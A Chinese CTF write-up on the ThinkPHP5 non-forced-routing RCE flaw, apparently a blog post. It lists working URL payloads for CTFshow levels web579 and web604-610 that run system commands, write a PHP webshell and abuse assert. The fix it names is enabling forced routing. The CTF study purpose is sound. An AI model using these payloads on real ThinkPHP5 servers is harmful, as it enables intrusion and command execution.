当前位置：首页 > news >正文

【Web】Ctfshow Thinkphp5 非强制路由RCE漏洞

news 2025/10/28 22:36:52

非强制路由RCE漏洞

web579

web604

web605

web606

web607-610

前面审了一些tp3的sql注入,终于到tp5了，要说tp5那最经典的还得是rce

下面介绍非强制路由RCE漏洞

非强制路由RCE漏洞原理

非强制路由相当于开了一个大口子，可以任意调用当前框架中的任意类的任意方法并传参。

下面是该漏洞的利用条件：

要修复这个漏洞非常简单，启用强制路由即可

很简单的道理，举个例子

index模块下控制器定义一个Address类，类里定义一个search()方法，并定义响应的路由访问+传参。

可以/search/5/4访问并传参

因为没有开启强制路由，所以下面这种方式可以达成一样的效果

?s=index/Address/search&id=5&uid=4

而且当前框架中的任意类的任意方法都是可以被直接调用的，所以我们只要找到恶意类的恶意方法传参即可，试着拿一个payload弹一个计算器，成功。

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=calc

ok我们已经实现了从0到1的突破了，剩下的就是各种payload的积累

从payload反推是很容易的，下面不再演示

贴出一篇文章

ThinkPHP5框架缺陷导致远程命令执行

先介绍一个通杀解：

利用\think\view\driver\Think类的__call方法

?s=index/\think\view\driver\Think/__call&method=display&params[]=<?php system('tac /f*'); ?>

web579

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=tac /f*

web604

?s=index/\think\Request/input&filter[]=system&data=tac /f*

web605

?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=<?php system('tac /f*');?>

web606

invokefunction大写即可

?s=index/think\app/invokeFunction&function=call_user_func_array&vars[0]=system&vars[1][]=tac /f*

或者：

?s=index/\think\Container/invokeFunction&function=assert&vars[0]=system('tac /f*');

web607-610

?s=index/\think\view\driver\Think/__call&method=display&params[]=<?php system('tac /f*'); ?>

【Web】Ctfshow Thinkphp5 非强制路由RCE漏洞

目录非强制路由RCE漏洞 web579 web604 web605 web606 web607-610 前面审了一些tp3的sql注入,终于到tp5了，要说tp5那最经典的还得是rce 下面介绍非强制路由RCE漏洞非强制路由RCE漏洞原理非强制路由相当于开了一个大口子，可以任意调用当前框…...

编程日记 2023/12/30 13:33:00

python3遇到Can‘t connect to HTTPS URL because the SSL module is not available.

远程服务器centos7系统上有minicoda3，觉得太占空间，就把整个文件夹删了，原先的Python3也没了，都要重装。我自己的步骤：进入管理员模式 1.下载Python3的源码： wget https://www.python.org/ftp/python/3.1…...

编程日记 2023/12/30 13:31:59

QSPI Flash xip取指同时program过程中概率性出现usb播歌时断音

项目场景： USB Audio芯片，代码放到qspi flash中，执行代码时，客户会偶尔保存一些参数，即FPGA验证过程中，每隔10ms向flash info区烧写4个byte（取指过程一直存在，且时隙软件不可控&…...

编程日记 2023/12/30 13:29:57

MySQL聚簇索引和非聚簇索引的区别

前言: 聚簇索引和非聚簇索引是数据库中的两种索引类型，他们在组织和存储数据时有不同的方式。聚簇索引： 简单理解，就是将数据和索引放在了一起，找到了索引也就找到了数据。对于聚簇索引来说，他的非叶子节点上存储的是…...

编程日记 2023/12/30 13:27:55

【C#】蜗牛爬井问题C#控制台实现

文章目录一、问题描述二、C#控制台代码一、问题描述井深30米，蜗牛在井底，每天爬3米又滑下1米，问第几天爬出来二、C#控制台代码 using System; using System.Collections.Generic; using System.Linq; using System.Text; using System…...

编程日记 2023/12/30 13:25:54

IP地址的四大类型：动态IP、固定IP、实体IP、虚拟IP的区别与应用

在网络通信中，IP地址是设备在互联网上唯一标识的关键元素。动态IP、固定IP、实体IP和虚拟IP是四种不同类型的IP地址，它们各自具有独特的特点和应用场景。 1. 动态IP地址： 动态IP地址是由Internet Service Provider（ISP&#xff…...

编程日记 2023/12/30 13:23:52

Linux Debian12安装和使用ImageMagick图像处理工具常见图片png、jpg格式转webp格式

一、ImageMagick简介 ImageMagick是一套功能强大、稳定而且免费的工具集和开发包。可以用来读、写和图像格式转换，可以处理超过100种图像格式，包括流行的TIFF, JPEG, GIF, PNG, PDF以及PhotoCD等格式。对图片的操作，即可以通过命令行进行&am…...

编程日记 2023/12/30 13:21:50

JavaScript二

目录流程控制 if判断 while循环 do while for循环 forEach for in Map与set iterator 流程控制 if判断 <script>use strictvar age 5;if(age < 3){alert("haha");}else if(age < 5){alert("hi world");}else{alert("hello wor…...

编程日记 2023/12/30 13:19:48

JavaScript系列——正则表达式

文章目录需求场景正则表达式的定义创建正则表达式通过 / 表示式/ 创建通过构造函数创建编写一个正则表达式的模式使用简单模式使用特殊字符常用特殊字符列表特殊字符组和范围正则表达式使用代码演示常用示例验证手机号码合法性小结需求场景在前端开发领域，在…...

编程日记 2023/12/30 13:18:47

命令行创建Vue项目

Vue项目创建 1. 打开UI界面在命令行中，执行如下指令： vue ui 2. 打开项目管理器 3. 创建项目创建项目的过程，需要联网进行，这可能会耗时比较长的时间，请耐心等待。 windows的命令行，容易卡顿&#xff0c…...

编程日记 2023/12/30 13:16:44

01.PostgreSQL基本SELECT语句

1. SQL简介 SQL 是用于访问和处理数据库的标准的计算机语言。 SQL有两个标准：分别是SQL92和SQL99,他们分别代表了92年和99年颁布的SQL标准，我们今天使用的SQL语言依然遵循这些标准。注意：除了 SQL 标准之外，大部分 SQL 数据库程序都拥有它们自己的私有扩展！ 2. SQL分…...

编程日记 2023/12/30 13:14:42

UDP信号多个电脑的信息传输测试、配置指南

最近要做一个东西，关于一个软件上得到的信号，如何通过连接的局域网，将数据传输出去。我没做过相关的东西，但是我想应该和软件连接数据库的过程大致是差不多的，就一个ip和一个端口号啥的。一.问题思路多个设备同时连…...

编程日记 2023/12/30 13:13:41

先序+中序还原二叉树【数据结构】

先序中序还原二叉树题目描述给定一棵二叉树的先序遍历序列和中序遍历序列，要求计算该二叉树的高度。输入输入首先给出正整数N（≤50），为树中结点总数。下面两行先后给出先序和中序遍历序列，均是长度为N的不包含重…...

编程日记 2023/12/30 13:10:38

【全网首发】洛谷P2678 [NOIP2015 提高组] 跳石头

Everyday English You don’t become what you want; you become whatyou believe. —Oprah Winfrey 你不是成为你想要的，你成为你所相信的。洛谷P2678 [NOIP2015 提高组] 跳石头题目描述一年一度的“跳石头”比赛又要开始了！ 这项比赛将在一条笔…...

编程日记 2023/12/30 13:07:35

Gpt指引ubuntu安装java8/11

在Ubuntu系统上安装Java环境通常包括以下几个步骤： 更新软件包索引： 在安装新软件之前，最好先更新Ubuntu的软件包索引。这可以确保你安装的是最新版本的软件包。可以使用以下命令来更新： sudo apt update安装Java： U…...

编程日记 2023/12/30 13:06:34

【MCAL】TC397+EB-tresos之MCU配置实战 - 芯片时钟

本篇文章介绍了在TC397平台使用EB-treso对MCU驱动模块进行配置的实战过程，主要介绍了后续基本每个外设模块都要涉及的芯片时钟部分，帮助读者了解TC397芯片的时钟树结构，在后续计算配置不同外设模块诸如通信速率，定时器周期等&…...

编程日记 2023/12/30 13:05:33

如何在MAC OS中的XCODE下添加＜bits/stdc++.h＞

mac上使用的编译器是Clang，但是没有万能头文件bits/stdc.h\，本文介绍如何添加万能头文件 Xcode 版本：15.1 - 打开应用程序-Xcode-右键显示包内容 Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/includ…...

编程日记 2023/12/30 13:00:29